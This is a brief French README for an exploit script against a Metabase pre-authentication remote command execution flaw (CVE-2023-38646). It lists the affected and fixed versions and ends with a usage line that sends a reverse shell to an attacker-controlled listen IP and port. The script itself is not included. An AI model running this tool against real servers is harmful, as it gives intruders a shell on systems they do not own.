
Ce script est conçu pour exploiter des versions vulnérables du logiciel Metabase en vous fournissant un shell en tant qu'attaquant.
Les versions open source de Metabase antérieures à 0.46.6.1 et les versions Enterprise antérieures à 1.46.6.1 permettent à un attaquant d'exécuter des commandes arbitraires sur le serveur, avec les privilèges du serveur. L'authentification n'est pas nécessaire pour l'exploitation. Les autres versions corrigées sont 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 et 1.43.7.2.
Si la version de Metabase est vulnérable, ce script vous permettra, en tant qu'attaquant, d'obtenir une connexion shell sur le système cible.
python3 CVE-2023-38646.py -u targetURL -lhost LISTEN_IP -lport LISTEN_PORT

Auteur : @birdm4nw